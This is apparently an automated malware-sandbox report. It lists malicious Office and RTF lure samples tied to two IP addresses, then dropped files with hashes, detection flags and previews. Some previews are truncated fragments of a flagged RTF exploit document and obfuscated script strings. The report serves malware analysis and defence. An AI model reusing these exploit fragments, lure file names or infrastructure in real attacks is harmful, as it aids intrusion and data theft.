                                  • 207.241.232.154
                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtfGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  • 207.241.232.154
                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtfGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  • 207.241.232.154
                                  PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  • 207.241.232.154
                                  ORDER 5172024.xla.xlsxGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  • 207.241.232.154
                                  SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  • 207.241.232.154
                                  7dcce5b76c8b17472d024758970a406bPaul Meeting Proposal and Schedule.xlsGet hashmaliciousFormBookBrowse
                                  • 208.64.171.230
                                  RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  RFQ_0020829024SEPT.xla.xlsxGet hashmaliciousUnknownBrowse
                                  • 208.64.171.230
                                  Sepco RFQ.xlsGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                  • 208.64.171.230
                                  Swift Payment.xlsGet hashmaliciousFormBookBrowse
                                  • 208.64.171.230
                                  Paul Agrotis List.xlsGet hashmaliciousFormBookBrowse
                                  • 208.64.171.230
                                  PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  PO-014842-2.xlsGet hashmaliciousFormBookBrowse
                                  • 208.64.171.230
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Roaming\dagifhdcapcut Setup-x64.msiGet hashmaliciousRedLineBrowse
                                    7YZlAbfKMg.rtfGet hashmaliciousAgentTeslaBrowse
                                      Product Inquiry466789.xlsGet hashmaliciousAgentTeslaBrowse
                                        A24-00342B139336 #TW_Inquiry.xlsGet hashmaliciousSmokeLoaderBrowse
                                          LgTFM1JlJu.rtfGet hashmaliciousAgentTeslaBrowse
                                            #20240627_Edlen_B.xlsGet hashmaliciousSmokeLoaderBrowse
                                              #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                                                Requirements.xla.xlsxGet hashmaliciousAveMaria, UACMeBrowse
                                                  vns.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                    Doc606112.xlsGet hashmaliciousAgentTeslaBrowse
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):131072
                                                      Entropy (8bit):0.02560424029065332
                                                      Encrypted:false
                                                      SSDEEP:6:I3DPcD3Ar9vxggLRWnGQ8kuRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKAdyHGvYg3J/
                                                      MD5:3D1B956F9FA3EC5031E267CB671773C9
                                                      SHA1:99A31C241AE4B2E0F87E35E1FD1F09DBF270F8C3
                                                      SHA-256:24DFC9C3EF8BCD182FD20A9054F42237CB04A70EEFE91F8D787036039C3D7C6B
                                                      SHA-512:C9FEFED8628A1B101445D0157A4080CF623D6738F7FEB46A17E8AC49F736CE0AE0A15F508D1BD0D96EB3D13709EB6CB9A0497D1E15217623795839BECEE9D3E5
                                                      Malicious:false
                                                      Preview:......M.eFy...z. .T=V.K...d..D&S,...X.F...Fa.q.............................d$t.fZI.;=................p.B.A]g'e.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):4760
                                                      Entropy (8bit):4.834060479684549
                                                      Encrypted:false
                                                      SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                      MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                      SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                      SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                      SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                      Malicious:false
                                                      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Rich Text Format data, version 1
                                                      Category:dropped
                                                      Size (bytes):102469
                                                      Entropy (8bit):2.582252060648168
                                                      Encrypted:false
                                                      SSDEEP:768:RnuaXplG+yhAWeLYLguPxUyxYxqY0WqhmRMw:RuTvhAWeLbuP6yiwY0WQmRMw
                                                      MD5:1131D758C8208AF277E943F04339E646
                                                      SHA1:030ADAC1ABC31AA8BC3A22DDA63C4A005AEE6E88
                                                      SHA-256:EB8381B156AAD734EF3A0328B4985ED1EDECA1C8D79D66E094598F8C6992AC71
                                                      SHA-512:31952FF007778891C6FE0E34931233E396EE3649C8E502FE35808F2322AFAFEEB89D102C3EB364E0C3C3BE1B84240A0375C58B4045A80AB2D838F0778DBBC5F0
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview:{\rtf1.............{\*\levelnumbers180579240 \%}.{\28554852%;*6,[<?|*;@9?(?(80?.!$'@.@|*??=~-1?3371*7!<_.4#-,9(?.)..~_##;3?+.7,(~+<<?))!).1>#__5..<:.9'^~2=058%]:@4|+31).^;??.8%==9[+_8*1$^%-%7]@?-**5;+&($~?=%,<579;?`]@13>3;(6:$1)`2*?6@|<![972+!:1`?2<+4/~4;4.(.9&>^]&?520^?/(4.`.%.'%;3.?0<6@^5>%5|;,.8?*52*&>$?_8$._1>,^|)).6`<~?@'>?%~??>8<?243>9-|`.?$*966^'3+;-'5*.+=+<.4&808?7:|1.0.91!62^8*2[]?<#:.&:2.>%%5-8??%!%5.)+?3(9?.5[~2'`?]88?>?&8+[2'*|?4^/>?=>3[&%!|_./9[;'.#?|`+?@%606=#)4^?/`~9~,#1@=$$<&?.@.$?5%'1*[7,472?2!9.+^@0!?,>7324+<^3$.$^89%.,?#`.==2+/_&)`#:?.8(?;@4?>9_<8]1?)&0#.1&!?[@(_^:&)(+[!0%<:'.|``]0|.?;_?9.!>_1]?8%].(%7^.;.(+@?,!=]?'%#???4%2*?.??&5.]5&&~;#..%?@%=(()-%^%0|?__]3%]_7`)^+3(+%!%%.-]^).?>??=.)%=_*$:;?($%%91,*0$/<&[38$?|:=..6.!9.$6/.1+??%%-2<.#,%>![_?*>#@2;_67)/74|`??;&#1&6|,|1(9?3-36??%,2?`?8>@~*-27..4-&-0)1,&8..=528.=29>6?|8>^(?/@]+?!'<(@*#0)|)32;2[?[.*?*;?`4=#-:`4?.^0-?[1.*-8]'6_?5.7)%|&%.~%4?(,%];~](..|`6'1..,?!$.#@_%#``;.=~+'([?7_.*414,4/4?_5@208$?;`.??|?:2|.6!?!)9?*^??
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):183084
                                                      Entropy (8bit):3.886576284833851
                                                      Encrypted:false
                                                      SSDEEP:3072:bYFoL2rQi6toiBDgt5p0Gwo9QjS7/DVRq9f1y9uuYaROM5e:0uqrh6BGqykae
                                                      MD5:5AC26F4D93962796DB9CD2E19B32B200
                                                      SHA1:9856C349AD2B408CDD23AA63A620F22FBDA87FA3
                                                      SHA-256:E3E7A3D0BA55B8DBBE3633B1DAD0A3BBF4EADA72DD8DF3F7B1BC76A692862F23
                                                      SHA-512:4C806A0A8FBA3FA9B24A0631D5A3E12F87E21AB3E45F44ECA8DE8C756F436B56E14D383A8B871BD5B5781624AC10E55F2FAD92DE02FA98E6FA53F57D6864B00A
                                                      Malicious:false
                                                      Preview:......a.O.L.h.K.f.L.q.J.U. .=. .".Z.n.f.L.W.m.C.c.G.n.".....U.z.p.u.L.N.N.f.K.k. .=. .".O.e.h.A.Q.W.U.x.L.L.".....L.c.g.O.G.K.m.K.c.L. .=. .".H.b.L.k.L.t.L.W.c.Q.".....v.c.U.s.f.l.Z.R.l.C. .=. .".m.L.u.b.S.T.k.K.W.h.".....k.O.G.G.J.A.l.U.e.f. .=. .".Z.R.f.K.z.W.L.Z.J.b.".....U.z.G.O.h.b.i.W.W.U. .=. .".Z.h.i.K.J.L.G.c.x.L.".....R.N.W.W.P.c.W.L.p.k. .=. .".i.n.L.c.R.a.L.O.R.T.".........L.J.R.H.p.W.O.L.i.A. .=. .".H.A.N.i.C.K.K.a.o.W.".....L.l.i.x.u.b.W.i.P.a. .=. .".e.C.P.x.b.Z.k.A.Q.c.".....c.a.W.i.l.m.i.U.Z.o. .=. .".P.O.b.f.c.P.W.t.m.W.".....p.b.n.Q.m.p.o.i.K.u. .=. .".Q.k.Z.A.v.l.I.x.c.J.".....P.q.i.G.N.O.k.W.u.S. .=. .".u.N.U.K.c.i.G.p.d.h.".....U.g.n.I.L.e.z.U.i.t. .=. .".I.W.G.c.L.u.h.W.H.k.".....o.a.k.C.e.o.A.L.z.i. .=. .".P.W.Z.Z.K.m.A.O.l.f.".....C.N.i.P.K.n.o.h.s.e. .=. .".N.G.U.q.L.d.i.z.G.W.".....P.c.K.P.T.W.k.e.Q.L. .=. .".s.h.N.H.b.z.k.W.T.W.".....L.N.G.L.t.A.H.i.d.G. .=. .".k.h.U.h.J.A.i.Z.P.W.".........P.c.Z.W.h.a.U.a.Q.s. .=. .".c.c.v.G.G.k.H.G.T.f.".....z.z.k.P.x.L.K.
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):43984
                                                      Entropy (8bit):3.1310314493532707
                                                      Encrypted:false
                                                      SSDEEP:384:Tsx4kqsFO5/aQIjNQ0vizlZLgshxctB+6umKKGve+o23nCjqgujyP:TWpO5iHjGPz3LThiB+6DKKGvex23nCBP
                                                      MD5:046BAAA04967159FF30067EDCA6AF959
                                                      SHA1:F47ACCE08111E384C411B0B0973EDBF2795CEB74
                                                      SHA-256:C853F5F5958D6A90D8ED5C62898BC2635310F448F07AFEFAA10D24E21BBFBC0E
                                                      SHA-512:0D8F0D6216B2219358951E06C366FEAC200294630C4F7BC6041DC4BA5CBC93B7BBBE35CF27DC7E8941EEC28E21C8164CE80B2272ADF4C5CFBD85837EFDE1893D
                                                      Malicious:false
                                                      Preview:....l...........;...............~@..xW.. EMF...............................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i.........................................................D................................2%.........d.........(.......0.................E.....(.......(.......0.......7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i.......................................................................................[.#............@.......8.......@.................E.....8.......8.......@.......7......................@.N..............C.a.l.i.b.r.i...........
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):6229368
                                                      Entropy (8bit):2.2428848517098547
                                                      Encrypted:false
                                                      SSDEEP:24576:meACi8BiJK+BIlNh67oJuoJhg1AutgNr+2:tbi8BiJK+By2oJuoJV
                                                      MD5:4528AD0C5AF3598AF2C354BFD8A0EBE1
                                                      SHA1:AA4C9E8FF7C78A604111F072FB6E19B094593031
                                                      SHA-256:F4A038BE121CD5C1A2E480501F031D0B81673B196108D12E50CBE08044A3B671
                                                      SHA-512:C464C1D6F2AD03814C4588AAB84AB1A105D6638EE4F45FDEDE04E588A85A7F94727FD44939C944279AFF5D15E30D475DCF004804E436AC64D7472C85B61D62E1
                                                      Malicious:false
                                                      Preview:....l...........r................H...@.. EMF....x._.2.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):6229368
                                                      Entropy (8bit):2.2428848517098547
                                                      Encrypted:false
                                                      SSDEEP:24576:meACi8BiJK+BIlNh67oJuoJhg1AutgNr+2:tbi8BiJK+By2oJuoJV
                                                      MD5:4528AD0C5AF3598AF2C354BFD8A0EBE1
                                                      SHA1:AA4C9E8FF7C78A604111F072FB6E19B094593031
                                                      SHA-256:F4A038BE121CD5C1A2E480501F031D0B81673B196108D12E50CBE08044A3B671
                                                      SHA-512:C464C1D6F2AD03814C4588AAB84AB1A105D6638EE4F45FDEDE04E588A85A7F94727FD44939C944279AFF5D15E30D475DCF004804E436AC64D7472C85B61D62E1
                                                      Malicious:false
                                                      Preview:....l...........r................H...@.. EMF....x._.2.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Rich Text Format data, version 1
                                                      Category:dropped
                                                      Size (bytes):102469
                                                      Entropy (8bit):2.582252060648168
                                                      Encrypted:false
                                                      SSDEEP:768:RnuaXplG+yhAWeLYLguPxUyxYxqY0WqhmRMw:RuTvhAWeLbuP6yiwY0WQmRMw
                                                      MD5:1131D758C8208AF277E943F04339E646
                                                      SHA1:030ADAC1ABC31AA8BC3A22DDA63C4A005AEE6E88
                                                      SHA-256:EB8381B156AAD734EF3A0328B4985ED1EDECA1C8D79D66E094598F8C6992AC71
                                                      SHA-512:31952FF007778891C6FE0E34931233E396EE3649C8E502FE35808F2322AFAFEEB89D102C3EB364E0C3C3BE1B84240A0375C58B4045A80AB2D838F0778DBBC5F0
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview:{\rtf1.............{\*\levelnumbers180579240 \%}.{\28554852%;*6,[<?|*;@9?(?(80?.!$'@.@|*??=~-1?3371*7!<_.4#-,9(?.)..~_##;3?+.7,(~+<<?))!).1>#__5..<:.9'^~2=058%]:@4|+31).^;??.8%==9[+_8*1$^%-%7]@?-**5;+&($~?=%,<579;?`]@13>3;(6:$1)`2*?6@|<![972+!:1`?2<+4/~4;4.(.9&>^]&?520^?/(4.`.%.'%;3.?0<6@^5>%5|;,.8?*52*&>$?_8$._1>,^|)).6`<~?@'>?%~??>8<?243>9-|`.?$*966^'3+;-'5*.+=+<.4&808?7:|1.0.91!62^8*2[]?<#:.&:2.>%%5-8??%!%5.)+?3(9?.5[~2'`?]88?>?&8+[2'*|?4^/>?=>3[&%!|_./9[;'.#?|`+?@%606=#)4^?/`~9~,#1@=$$<&?.@.$?5%'1*[7,472?2!9.+^@0!?,>7324+<^3$.$^89%.,?#`.==2+/_&)`#:?.8(?;@4?>9_<8]1?)&0#.1&!?[@(_^:&)(+[!0%<:'.|``]0|.?;_?9.!>_1]?8%].(%7^.;.(+@?,!=]?'%#???4%2*?.??&5.]5&&~;#..%?@%=(()-%^%0|?__]3%]_7`)^+3(+%!%%.-]^).?>??=.)%=_*$:;?($%%91,*0$/<&[38$?|:=..6.!9.$6/.1+??%%-2<.#,%>![_?*>#@2;_67)/74|`??;&#1&6|,|1(9?3-36??%,2?`?8>@~*-27..4-&-0)1,&8..=528.=29>6?|8>^(?/@]+?!'<(@*#0)|)32;2[?[.*?*;?`4=#-:`4?.^0-?[1.*-8]'6_?5.7)%|&%.~%4?(,%];~](..|`6'1..,?!$.#@_%#``;.=~+'([?7_.*414,4/4?_5@208$?;`.??|?:2|.6!?!)9?*^??
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                      Category:dropped
                                                      Size (bytes):32768
                                                      Entropy (8bit):1.6838296052120771
                                                      Encrypted:false
                                                      SSDEEP:96:LIpMPzZhl1NlHUwxx83jKimMP6Pnel1NlHUwxx83jKi:LBPzZRHUw4ewP6PnMHUw4e
                                                      MD5:4CC76557ED20CEE6A292CDC3AD3F28BE
                                                      SHA1:87F8C6BCDF8AD6F3587AFF1F1F2C2456324F8EB0
                                                      SHA-256:C0D642DE473D587F6E95C015DB09737E57656777FF86CB6631764731419D01C4
                                                      SHA-512:B8630D1CBAEAFC90738EF359D78FF3F1EB1B711CD83DB3EFBF257AA69B35EB0FEEABF05736BB2EAB0C7B86BD047753F3F81E0CBC64D8CA63F7BD43A5206DC438
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):11264
                                                      Entropy (8bit):3.5496637746188817
                                                      Encrypted:false
                                                      SSDEEP:192:W0hkLlVEaY2KaQP1fQERQprctBmUgXBRJZA/D2MuwsL0nxjywfUemlEDolBMBIQp:/kZylraQP1oIQprctBmRBPe97xjywfOG
                                                      MD5:C42E774D567E93B5E18C2B2924F91E1C
                                                      SHA1:0995AFAB2B817F602BD468F5E3305DCF67856FD1
                                                      SHA-256:0A8B81DDD6CE6714E801B89A502E1BA21BD708227AB67F938DA4B3057480C7C4
                                                      SHA-512:4C5047360328E53DB58DB32294695EED75A4E9269C8CD001746598DAECA77293505651DF346D5E8AD09E363F661A220EEA3E865403630503DF66DB5DF2332DC0
                                                      Malicious:false
                                                      Preview:..............8.5.5.4.8.5.2.%.;.*.6.,.[.<.?.|.*.;.@.9.?.(.?.(.8.0.?...!.$.'.@...@.|.*.?.?.=.~.-.1.?.3.3.7.1.*.7.!.<._...4.#.-.,.9.(.?...).....~._.#.#.;.3.?.+...7.,.(.~.+.<.<.?.).).!.)...1.>.#._._.5.....<.:...9.'.^.~.2.=.0.5.8.%.].:.@.4.|.+.3.1.)...^.;.?.?...8.%.=.=.9.[.+._.8.*.1.$.^.%.-.%.7.].@.?.-.*.*.5.;.+.&.(.$.~.?.=.%.,.<.5.7.9.;.?.`.].@.1.3.>.3.;.(.6.:.$.1.).`.2.*.?.6.@.|.<.!.[.9.7.2.+.!.:.1.`.?.2.<.+.4./.~.4.;.4...(...9.&.>.^.].&.?.5.2.0.^.?./.(.4...`...%...'.%.;.3...?.0.<.6.@.^.5.>.%.5.|.;.,...8.?.*.5.2.*.&.>.$.?._.8.$..._.1.>.,.^.|.).)...6.`.<.~.?.@.'.>.?.%.~.?.?.>.8.<.?.2.4.3.>.9.-.|.`...?.$.*.9.6.6.^.'.3.+.;.-.'.5.*...+.=.+.<...4.&.8.0.8.?.7.:.|.1...0...9.1.!.6.2.^.8.*.2.[.].?.<.#.:...&.:.2...>.%.%.5.-.8.?.?.%.!.%.5...).+.?.3.(.9.?...5.[.~.2.'.`.?.].8.8.?.>.?.&.8.+.[.2.'.*.|.?.4.^./.>.?.=.>.3.[.&.%.!.|._.../.9.[.;.'...#.?.|.`.+.?.@.%.6.0.6.=.#.).4.^.?./.`.~.9.~.,.#.1.@.=.$.$.<.&.?...@...$.?.5.%.'.1.*.[.7.,.4.7.2.?.2.!.9...+.^.@.0.!.?.,.>.7.3.2.4.+.<.^.3.$...$.^.8.9.%...,.?.#.
                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                      Category:dropped
                                                      Size (bytes):40960
                                                      Entropy (8bit):0.7798653713156546
                                                      Encrypted:false
                                                      SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                      MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                      SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                      SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                      SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                      Category:dropped
                                                      Size (bytes):20480
                                                      Entropy (8bit):1.3870145383915669
                                                      Encrypted:false
                                                      SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                      MD5:1623709C6B2FB813984B1265C26A85F1
                                                      SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                      SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                      SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                      Category:dropped
                                                      Size (bytes):77824
                                                      Entropy (8bit):1.133993246026424
                                                      Encrypted:false
                                                      SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                      MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                      SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                      SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                      SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
